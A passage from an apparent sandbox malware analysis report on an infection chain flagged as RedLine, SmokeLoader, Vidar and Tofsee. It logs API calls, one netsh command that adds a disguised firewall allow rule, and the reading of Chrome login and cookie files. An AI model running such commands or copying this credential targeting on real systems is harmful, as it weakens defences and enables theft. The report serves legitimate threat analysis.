                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: _GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,__invoke_watson_if_error,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,GetLocaleInfoA,__stricmp,__strnicmp,_strlen,_TestDefaultCountry,GetLocaleInfoA,__stricmp,_strlen,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: GetLocaleInfoA,GetACP,GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: GetLocaleInfoW,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: __crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,_malloc,__MarkAllocaS,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,__freea,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: ___crtGetLocaleInfoW,GetLastError,___crtGetLocaleInfoW,___crtGetLocaleInfoW,_strncpy_s,__invoke_watson_if_error,___crtGetLocaleInfoW,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultCountry,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: ___getlocaleinfo,GetCPInfo,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: _strlen,EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\nkINykHreE.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exe Code function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exe Code function: ___getlocaleinfo,__malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exe Code function: __crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exe Code function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exe Code function: ___crtGetLocaleInfoW,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,__invoke_watson_if_error,___crtGetLocaleInfoW,_isdigit,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Code function: ___getlocaleinfo,__malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Code function: __crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Code function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Code function: ___crtGetLocaleInfoW,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,__invoke_watson_if_error,___crtGetLocaleInfoW,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe Code function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe Code function: ___getlocaleinfo,__malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe Code function: __crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: ___crtGetLocaleInfoW,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,__invoke_watson_if_error,___crtGetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CBA.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CBA.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2757.exe VolumeInformation
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00432800 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_0040B211 FileTimeToSystemTime,GetLocalTime,FileTimeToLocalFileTime,FileTimeToSystemTime,SystemTimeToFileTime,FileTimeToSystemTime,GetTimeZoneInformation,wsprintfA,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00409326 GetVersionExA,GetModuleHandleA,GetModuleFileNameA,wsprintfA,wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Uses netsh to modify the Windows network and firewall settings
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Changes security center settings (notifications, updates, antivirus, firewall)
                      Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Modifies the windows firewall
                      Source: C:\Users\user\AppData\Local\Temp\18D.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 00000009.00000002.519463361.0000021174C3D000.00000004.00000001.sdmp | Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000009.00000002.519523482.0000021174D02000.00000004.00000001.sdmp, CBA.exe, 00000021.00000002.574771565.0000000001621000.00000004.00000020.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      Yara detected RedLine Stealer
                      Source: Yara match | File source: 33.0.CBA.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.CBA.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.0.CBA.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.0.CBA.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.CBA.exe.423fe20.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.0.CBA.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.0.CBA.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.CBA.exe.423fe20.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000031.00000002.609571282.0000000003AA7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000000.402116569.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000000.403620699.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000000.401238970.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000002.515289620.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000030.00000003.484873099.00000000034F2000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000003.491680197.00000000009A3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000002.552523209.0000000002515000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000000.403113050.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.408243360.0000000004121000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000002.571203673.00000000029E0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000031.00000002.568085789.0000000002810000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected SmokeLoader
                      Source: Yara match | File source: 1.2.nkINykHreE.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.haifbcd.4715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.1.nkINykHreE.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.1.haifbcd.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.nkINykHreE.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 14.2.115B.exe.4715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.1.115B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.haifbcd.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.115B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000003.00000000.282842442.0000000003A61000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.370053936.0000000000751000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.352429754.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.297306514.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000026.00000002.444174815.0000000000951000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.352266837.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.297326406.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.370019662.0000000000620000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000026.00000002.442728079.0000000000630000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Vidar stealer
                      Source: Yara match | File source: 0000002F.00000002.595854272.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000002.574522590.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002F.00000002.566415908.0000000000961000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000002.525192064.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000027.00000002.537263879.00000000008C7000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002F.00000002.533111165.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000003.469387095.0000000000980000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002F.00000003.476837740.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Tofsee
                      Source: Yara match | File source: 18.2.18D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.sdiimdop.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.svchost.exe.2bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.sdiimdop.exe.600000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.sdiimdop.exe.600000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.18D.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.3.sdiimdop.exe.570000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.18D.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.3.18D.exe.560000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.sdiimdop.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.sdiimdop.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.svchost.exe.2bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000001F.00000002.396765412.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.390911110.0000000000540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.395236716.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000002.550647204.0000000002BB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.396983806.0000000000600000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.396894340.0000000000540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.390725871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000003.369452134.0000000000560000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 18D.exe PID: 4992, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: sdiimdop.exe PID: 4560, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5180, type: MEMORYSTR
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\2757.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: Yara match | File source: 0000002F.00000002.595854272.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002E.00000002.574522590.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002F.00000002.566415908.0000000000961000.00000004.00000020.sdmp, type: MEMORY
